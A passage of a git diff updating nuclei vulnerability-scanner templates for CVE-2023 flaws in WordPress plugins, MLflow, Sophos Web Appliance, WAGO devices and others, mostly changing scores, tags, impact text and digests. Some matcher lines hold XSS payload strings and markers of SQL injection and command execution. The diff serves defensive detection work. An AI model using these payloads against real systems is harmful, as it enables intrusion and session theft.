cpe:2.3:a:artisanworkshop:japanized_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,7 +29,7 @@ info: vendor: artisanworkshop product: japanized_for_woocommerce framework: wordpress - tags: cve2023,woocommerce-for-japan,wp,wpscan,wordpress,authenticated,cve,xss,woocommerce,plugin + tags: cve2023,cve,woocommerce-for-japan,wp,wpscan,wordpress,authenticated,xss,woocommerce,plugin,artisanworkshop http: - raw: @@ -47,4 +49,4 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "<svg/onload=alert(document.domain)>") && contains(body_2, "woocommerce-for-japan")' condition: and -# digest: 4b0a00483046022100f26ca941a58f9e006361c6154d37515c604d64d5bb72160e705bfe98393fedd2022100d894f6623ab7e3b1338e254ea2a737dbb10b0d5ca47abe9f7c1d6c8fd85b6856:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205a6154be3977335b0b6a8edafe8ebf0cdc8be8592b0dde724b514055ced4fc0e022100935f1df2f35df2ff8160527c45087dc5c1a387351a1dcc8ea9fea63d30041d53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0947.yaml b/nuclei-templates/CVE-2023/CVE-2023-0947.yaml index dff506c1be..69843c26b2 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0947.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0947.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-0947 cwe-id: CWE-22 - epss-score: 0.0263 - epss-percentile: 0.89208 + epss-score: 0.0114 + epss-percentile: 0.84427 cpe: cpe:2.3:a:flatpress:flatpress:*:*:*:*:*:*:*:* metadata: verified: true @@ -24,7 +24,7 @@ info: vendor: flatpress product: flatpress shodan-query: http.favicon.hash:-1189292869 - tags: huntr,cve,cve2023,lfi,flatpress,listing + tags: cve,cve2023,huntr,lfi,flatpress,listing http: - method: GET @@ -39,4 +39,4 @@ http: - 'status_code == 200' - 'contains(body, "<title>Index of /fp-content")' condition: and -# digest: 4b0a00483046022100d1959892b42af2b745bb53da64fbd3303c9418574343b186a84eea4fa7b9477d022100c0b4e200502ddcb01ea54dec4e9226876ef5eed3631ee26029ccb298ad0c4de1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a6fad072aa7b7a33eeb7febfa517c81a87cdd0458f78e659f4436d97e14cda8c02201122c5d07ec27092761f1e6d267c54e6cd56b9d6df20fe247ee60f0783601bd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0948.yaml b/nuclei-templates/CVE-2023/CVE-2023-0948.yaml index 9c9dbd043d..39f153eda8 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0948.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0948.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Japanized for WooCommerce plugin before 2.5.8 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 2.5.8. reference: - https://wpscan.com/vulnerability/a78d75b2-85a0-41eb-9720-c726ca2e8718 @@ -17,7 +19,7 @@ info: cve-id: CVE-2023-0948 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29557 + epss-percentile: 0.29003 cpe: cpe:2.3:a:artisanworkshop:japanized_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: "true" @@ -25,7 +27,7 @@ info: vendor: artisanworkshop product: japanized_for_woocommerce framework: wordpress - tags: wpscan,cve,cve2023,xss,woocommerce-for-japan,wordpress,wp-plugin,wp,authenticated + tags: cve,cve2023,wpscan,xss,woocommerce-for-japan,wordpress,wp-plugin,wp,authenticated,artisanworkshop http: - raw: @@ -47,4 +49,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "peachpay")' condition: and -# digest: 4a0a0047304502201858079bb4de8ef6c8f924b30d70a5f4ba3f49294bc65779fd13a419f02e7230022100de7cee4a6c861f4b07b8abe2f257bb22d5c67771e88991f3429a0315e6d7dc79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207489300b27fc604ebc086d2dcf53a066f713bf6e155fc3d7e796b5d5e7073f41022100d763b61ecc36c48a60e65fcac863f65fb4d354916e78aef5854c9720707c38f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0968.yaml b/nuclei-templates/CVE-2023/CVE-2023-0968.yaml index 05fb84a0e8..16ff8ebd50 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0968.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0968.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Watu Quiz plugin before 3.3.9.1 is susceptible to cross-site scripting. The plugin does not sanitize and escape some parameters, such as email, dn, date, and points, before outputting then back in a page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This exploit can be used against high-privilege users such as admin. + impact: | + Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts on the victim's browser. remediation: Fixed in version 3.3.9.1. reference: - https://wpscan.com/vulnerability/29008d1a-62b3-4f40-b5a3-134455b01595 @@ -18,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0968 cwe-id: CWE-79 - epss-score: 0.00286 - epss-percentile: 0.65337 + epss-score: 0.00229 + epss-percentile: 0.61047 cpe: cpe:2.3:a:kibokolabs:watu_quiz:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,7 +29,7 @@ info: vendor: kibokolabs product: watu_quiz framework: wordpress - tags: wordpress,cve,cve2023,wp,wp-plugin,xss,watu,authenticated,wpscan + tags: cve2023,cve,wordpress,wp,wp-plugin,xss,watu,authenticated,wpscan,kibokolabs http: - raw: @@ -49,4 +51,4 @@ http: - 'contains(body_2, "/onmouseover=alert(document.domain)//")' - 'contains(body_2, "Watu Quizzes")' condition: and -# digest: 490a0046304402205b133c8abef7990358984ec39f887631359a20a38dfc16a0778f26f5e77f99f3022047a3fbd4b3294c79db7062fb1931676d27d531915e38cf52cf9165a2966425a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220101a9d9c53b24a7571530b23ae247be38f0e4664af24681277fdacfd89e411ce02206695c9ba4925e33fea75684fa188a7bbe650cbebaa6750343535fa6fa8939a43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1020.yaml b/nuclei-templates/CVE-2023/CVE-2023-1020.yaml index 2c47b30d9c..9acbdeec07 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1020.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1020.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-1020 cwe-id: CWE-89 - epss-score: 0.09522 - epss-percentile: 0.94153 + epss-score: 0.05497 + epss-percentile: 0.93034 cpe: cpe:2.3:a:wp_live_chat_shoutbox_project:wp_live_chat_shoutbox:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: vendor: wp_live_chat_shoutbox_project product: wp_live_chat_shoutbox framework: wordpress - tags: wpscan,cve,cve2023,sqli,wordpress,wp-plugin,wp,wp-shoutbox-live-chat + tags: cve2023,cve,wpscan,sqli,wordpress,wp-plugin,wp,wp-shoutbox-live-chat,wp_live_chat_shoutbox_project http: - raw: @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f85a10c5106f8eaceb21915c617d41a1a6514e12baaa53bc7b2614230ce974b402203633cb96d4f59ee753e32acd91b5a0a658ea6cb0725008ad1080c4875cd5a6a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fac5c85ebe071ae5ef03e6745f869794a516d4dd1a7fd22f58ec3d490039c84c022100cafea571a15f3be63d57818f9c9386f1433fe77561b33395aeb30cde8b682100:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1080.yaml b/nuclei-templates/CVE-2023/CVE-2023-1080.yaml index 835d957e1d..9a7d4ce305 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1080.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1080.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress GN Publisher plugin before 1.5.6 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions. remediation: Fixed in version 1.5.6. reference: - https://wpscan.com/vulnerability/fcbcfb56-640d-4071-bc12-acac1b1e7a74 @@ -18,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-1080 cwe-id: CWE-79 - epss-score: 0.00286 - epss-percentile: 0.65337 + epss-score: 0.0025 + epss-percentile: 0.64332 cpe: cpe:2.3:a:gnpublisher:gn_publisher:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,7 +29,7 @@ info: vendor: gnpublisher product: gn_publisher framework: wordpress - tags: wp-plugin,wordpress,gn-publisher,authenticated,cve2023,wp,xss,wpscan,cve + tags: cve2023,cve,wp-plugin,wordpress,gn-publisher,authenticated,wp,xss,wpscan,gnpublisher http: - raw: @@ -49,4 +51,4 @@ http: - 'contains(body_2, "/ onmouseover=alert(document.domain);//")' - 'contains(body_2, "GN Publisher")' condition: and -# digest: 490a0046304402202d097908fcb74259d96d94c9e7d950e2e5b186eb0ac1c4a48c7b772ef3e57bd8022032db25787556e60f21437ab17b7001a749736e4bd9683abece4eeab2ba43520b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009e1ffc42fadc2223a2bde2cfca3d21b2ccb40f02c1ccf27a1ded4325da215dfb022100fd1a246c50613256dcd59279b3f0ea4fcde05ce171adfeabd1d5068a35986ed9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1177.yaml b/nuclei-templates/CVE-2023/CVE-2023-1177.yaml index 295b3dcb68..dd02c9198b 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1177.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1177.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Mlflow before 2.2.1 is susceptible to local file inclusion due to path traversal \..\filename in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation could allow an attacker to read sensitive files on the server. remediation: | Upgrade Mlflow to version 2.2.1 or later to mitigate the vulnerability. reference: @@ -18,9 +20,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-1177 - cwe-id: CWE-22,CWE-29 - epss-score: 0.03046 - epss-percentile: 0.89909 + cwe-id: CWE-29,CWE-22 + epss-score: 0.02668 + epss-percentile: 0.89327 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" - tags: mlflow,oss,lfi,huntr,cve,cve2023,intrusive + tags: cve2023,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects http: - raw: @@ -66,4 +68,4 @@ http: - '"version": "([0-9.]+)",' internal: true part: body -# digest: 4b0a00483046022100ddf8c97e69245d99a1004b460686e101756f893719d2d38d810ecc47f1948e44022100bfe69f076c6bfde9828bdcd20e6c8014e0214ccb2f8b626e4d67e807fc18f22b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d755ca22bd1d15b3e2037d22374fbe60d7b1db9c35cc6a4cad95e1b57c88d42a022100c8c05dd9d1b11648b906d574c3f74255eabdd64d0283c45bb8dac0ee7c66c3cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1263.yaml b/nuclei-templates/CVE-2023/CVE-2023-1263.yaml index 12fe3593e4..3ff851d678 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1263.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1263.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.3 cve-id: CVE-2023-1263 cwe-id: CWE-200 - epss-score: 0.00359 - epss-percentile: 0.69106 + epss-score: 0.00238 + epss-percentile: 0.61195 cpe: cpe:2.3:a:niteothemes:coming_soon_\&_maintenance:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,7 +28,7 @@ info: product: coming_soon_\&_maintenance framework: wordpress publicwww-query: "/wp-content/plugins/cmp-coming-soon-maintenance/" - tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,cmp-coming-soon-maintenance,unauth + tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,cmp-coming-soon-maintenance,unauth,niteothemes http: - raw: @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203bbfdf43e7fb447a44df3227095c400e7a521ee867d3285fa7c9a323c4227ef7022100ed6efe7a763c1122ca4ba614bc58f3fffe1924eb85e7218892b9ffae9511b14b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022011e5f903b0a93f9e3c06ec147cc8c3f99a9d83b16945cc273a867de1c81ea74e0221009f399c551bcf521294a213c1b973399eb02bea51059fdf559b11acf56aff52ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1362.yaml b/nuclei-templates/CVE-2023/CVE-2023-1362.yaml index c68797d66d..d50e1cf238 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1362.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1362.yaml @@ -6,26 +6,29 @@ info: severity: medium description: | This template checks for the presence of clickjacking prevention headers in the HTTP response, aiming to identify vulnerabilities related to the improper restriction of rendered UI layers or frames in the GitHub repository unilogies/bumsys prior to version 2.0.2. + impact: | + An attacker can trick users into performing unintended actions on the vulnerable application. remediation: | Upgrade to version 2.0.2 or later to mitigate the Clickjacking vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-1362 - https://huntr.dev/bounties/e5959166-c8ef-4ada-9bb1-0ff5a9693bac/ - https://github.com/unilogies/bumsys/commit/8c5b27d54707f9805b27ef26ad741f2801e30e1f + - https://github.com/ctflearner/ctflearner classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-1362 cwe-id: CWE-1021 - epss-score: 0.00078 - epss-percentile: 0.33055 + epss-score: 0.00421 + epss-percentile: 0.71594 cpe: cpe:2.3:a:bumsys_project:bumsys:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: bumsys_project product: bumsys - tags: cve,cve2023,bumsys,clickjacking,huntr + tags: cve,cve2023,bumsys,clickjacking,huntr,bumsys_project http: - method: GET @@ -39,4 +42,4 @@ http: - "!regex('X-Frame-Options', header)" - "contains(body, 'BUMSys')" condition: and -# digest: 4a0a0047304502202a64abc0a997cdee4087425d5902226ed51600313c789ee9770d42574b9ede8502210085b81e07b93b4bb93010364a14b5bc2f4b56206198d76d85a7413375b15b0dd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100db736e1f7e3b60b5cdc1776b06c2485456e5878e8fb3742146e4e593eeaa3f95022100f0fbea2cbfdb563686635b04f3c66d63dc0874d5c884e91e104af6118f8f9deb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1408.yaml b/nuclei-templates/CVE-2023/CVE-2023-1408.yaml index ce176bce81..1bef666e4f 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1408.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1408.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.2 cve-id: CVE-2023-1408 cwe-id: CWE-89 - epss-score: 0.00995 - epss-percentile: 0.81873 + epss-score: 0.01339 + epss-percentile: 0.84615 cpe: cpe:2.3:a:video_list_manager_project:video_list_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +25,7 @@ info: product: video_list_manager framework: wordpress publicwww-query: /wp-content/plugins/video-list-manager/ - tags: wpscan,cve,cve2023,sqli,wordpress,wp-plugin,wp,authenticated + tags: cve,cve2023,wpscan,sqli,wordpress,wp-plugin,wp,authenticated,video_list_manager_project http: - raw: @@ -48,4 +48,4 @@ http: - 'status_code_2 == 200' - 'contains_all(body_2, "Edit Video","Youtube")' condition: and -# digest: 490a004630440220084425c156988bb94e19ee4a2832732836bf94a03cd90d6c8beb942dd741621b02203092a21cb4a1032a1ed44cf60b22f542ec879450bd10db5b301d67b43b3ef3a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220557189f3aeda3c74e23c7c2eafca9a9ffd0d874f4c21f4998f0fa7da5b3d34390220535b42e7ed0a6ca565fbab863cb242ca58ab68d291a3470b7e8c5d54ebf0de30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1434.yaml b/nuclei-templates/CVE-2023/CVE-2023-1434.yaml index ebc2527106..dc69545591 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1434.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1434.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: @@ -18,7 +20,7 @@ info: verified: true max-request: 1 shodan-query: title:"Odoo" - tags: cve,cve2023,odoo,xss + tags: cve2023,cve,odoo,xss http: - method: GET @@ -43,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402206aca9c974becbffd46255feaa2ba0db4491e5219a35c0cbc3db40fd20486142d02202661ddbc904295781fbbdea1b323355da660ee9b7a33d68fe758aced5040f602:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009f88c973f15e82b4aad7aedc75098b0daca742aa8b6fe3cfb11e203d2306539b022050fd604d6227ce671990eaac0780f3c69d00cd07567190bf96d24b10177fddb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1454.yaml b/nuclei-templates/CVE-2023/CVE-2023-1454.yaml index 287aa5fbb9..475f7f3a27 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1454.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1454.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade Jeecg-boot to a patched version or apply the necessary security patches provided by the vendor. reference: @@ -13,13 +15,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2023-1454 - https://vuldb.com/?ctiid.223299 - https://vuldb.com/?id.223299 + - https://github.com/Awrrays/FrameVul classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-1454 cwe-id: CWE-89 - epss-score: 0.0391 - epss-percentile: 0.91024 + epss-score: 0.04509 + epss-percentile: 0.92282 cpe: cpe:2.3:a:jeecg:jeecg-boot:3.5.0:*:*:*:*:*:*:* metadata: verified: "true" @@ -27,7 +30,7 @@ info: vendor: jeecg product: jeecg-boot shodan-query: http.favicon.hash:1380908726 - tags: cve,cve2023,jeecg,sqli + tags: cve2023,cve,jeecg,sqli http: - raw: @@ -64,5 +67,4 @@ http: - "XPATH syntax error: '([a-z- @%]+)'" - "XPATH syntax error: '([a-z@%0-9.]+)'" part: body - -# digest: 4a0a0047304502200085a9768ebb8df398eb82e7fddaa356141db81e8dfd26e12c89f6248d514773022100d372347570c6bd81b5e86b9de313568b7b2671a7099429e9eb906ac7ff4e3657:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201617c97220bd0ac605e36efc6731e6e680ab819a2d613804423de883aba8d1eb0220562bcbd34db0c1ce70cd835193e6819e76e7cef2925feda6621420165482860b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1496.yaml b/nuclei-templates/CVE-2023/CVE-2023-1496.yaml index 59db7d1325..ea5d2f901e 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1496.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1496.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Cross-site Scripting (XSS) - Reflected in GitHub repository imgproxy/imgproxy prior to 3.14.0. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: | Upgrade to Imgproxy version 3.14.0 or later to mitigate this vulnerability. reference: @@ -15,8 +17,8 @@ info: cvss-score: 5.4 cve-id: CVE-2023-1496 cwe-id: CWE-79 - epss-score: 0.00077 - epss-percentile: 0.32217 + epss-score: 0.00085 + epss-percentile: 0.34963 cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:* metadata: verified: true @@ -24,7 +26,7 @@ info: vendor: evilmartians product: imgproxy shodan-query: "Server: imgproxy" - tags: huntr,cve,cve2023,imgproxy,xss,svg + tags: cve,cve2023,huntr,imgproxy,xss,svg,evilmartians http: - method: GET @@ -42,4 +44,4 @@ http: - type: dsl dsl: - content_security_policy -# digest: 4a0a00473045022100c34ab8bbd6b6f0f52064e9f9fdf393ad934a05eba16ac9b9b536123f3d3d9f7f022061b59faf3bc8e22ddf3c484d3357c4a0a2d84f97af4395446a6f7848dc73803a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202ad789f0ac262a3012d88a82fabcb0495918466b6945c80a40a9cf0f17501756022100fcd6b4965a63afc6ed0a5933664366f832ca12cc04bd2e4809dbd1fec88dc51b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1546.yaml b/nuclei-templates/CVE-2023/CVE-2023-1546.yaml index 96c55bacd1..9197a040a0 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1546.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1546.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The MyCryptoCheckout WordPress plugin before 2.124 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 2.124 reference: - https://wpscan.com/vulnerability/bb065397-370f-4ee1-a2c8-20e4dc4415a0 @@ -16,7 +18,7 @@ info: cve-id: CVE-2023-1546 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29531 + epss-percentile: 0.29221 cpe: cpe:2.3:a:plainviewplugins:mycryptocheckout:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,7 +26,7 @@ info: vendor: plainviewplugins product: mycryptocheckout framework: wordpress - tags: cve,cve2023,wordpress,wp,wp-plugin,xss,wpscan,authenticated + tags: cve,cve2023,wordpress,wp,wp-plugin,xss,wpscan,authenticated,plainviewplugins http: - raw: @@ -46,4 +48,4 @@ http: - 'contains(body_2, "scriptalert(/XSS/)/script")' - 'contains(body_2, "mycryptocheckout")' condition: and -# digest: 490a004630440220376d49479e10434de442d31e8988e8b4fd4b748f0230ae086de68653daa91a39022034d3d5ee3ed2e1ae5e49fe9ee7889be3e4af429094d413aa0214b379e92fc3ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022018d8d859d1510e71d41e4dcab2713a5820907e67c0445dd0ecdb4500c0fa6b730220327729b1610301143ba6cbd8037ecece03bc57e6fcd4ce7118478ec6102d864a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1671.yaml b/nuclei-templates/CVE-2023/CVE-2023-1671.yaml index e99c694c22..b2c83a3a55 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1671.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1671.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches or updates provided by Sophos to mitigate this vulnerability. reference: @@ -13,13 +15,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2023-1671 - http://packetstormsecurity.com/files/172016/Sophos-Web-Appliance-4.3.10.4-Command-Injection.html - https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce + - https://github.com/lions2012/Penetration_Testing_POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-1671 cwe-id: CWE-77 - epss-score: 0.9526 - epss-percentile: 0.99153 + epss-score: 0.96156 + epss-percentile: 0.99469 cpe: cpe:2.3:a:sophos:web_appliance:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +31,7 @@ info: product: web_appliance shodan-query: title:"Sophos Web Appliance" fofa-query: title="Sophos Web Appliance" - tags: packetstorm,cve,cve2023,rce,sophos,oast,kev + tags: cve2023,cve,packetstorm,rce,sophos,oast,kev http: - raw: @@ -50,4 +53,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 4b0a004830460221008b3de2245abaa1a66fa96e677ebe4921d18423135ac95464ab9aae76bd1b2e0a022100e658b0a2211db0334aa3b350b968648077623dff6a01b394635fcf250f884da9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ae0e465ec75fd0a4861424e3aad7f02640cf6221038527efafe82c6742e6737002206c97e80f7b304f7c6b2617847d8a6c3bc6133ac27161b8921c0781f00317ca0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1698.yaml b/nuclei-templates/CVE-2023/CVE-2023-1698.yaml index 93615d66d1..905690f7d5 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1698.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1698.yaml @@ -1,23 +1,35 @@ id: CVE-2023-1698 info: - name: WAGO - Unauthenticated Remote Command Execution + name: WAGO - Remote Command Execution author: xianke - severity: high + severity: critical description: | - In multiple products of WAGO a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behaviour, Denial of Service and full system compromise. + In multiple products of WAGO, a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behavior, Denial of Service, and full system compromise. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system. + remediation: | + Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability. reference: - https://onekey.com/blog/security-advisory-wago-unauthenticated-remote-command-execution/ - https://nvd.nist.gov/vuln/detail/CVE-2023-1698 + - https://cert.vde.com/en/advisories/VDE-2023-007/ + - https://github.com/codeb0ss/CVE-2023-1698-PoC + - https://github.com/deIndra/CVE-2023-1698 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-1698 cwe-id: CWE-78 + epss-score: 0.55051 + epss-percentile: 0.97591 + cpe: cpe:2.3:o:wago:compact_controller_100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: html:"WAGO" - tags: cve,cve2023,wago,rce,unauth + vendor: wago + product: compact_controller_100_firmware + shodan-query: html:"/wbm/" html:"wago" + tags: cve2023,cve,wago,rce http: - raw: @@ -34,10 +46,12 @@ http: part: body words: - '"license":' - - '"package":' - - 'uid' + - '"name":' + - 'uid=' + - 'gid=' condition: and - type: status status: - 200 +# digest: 4a0a00473045022100b407d13bb092bfd293626f93b9765b760fc504f78be29190689950f60041a7bf02200e23d21826874028db946e7c4a4af5e0b05de0bed54232eb4b63c39eb70fe3aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1719.yaml b/nuclei-templates/CVE-2023/CVE-2023-1719.yaml index 619a5a5367..7dff6c4314 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1719.yaml +++ 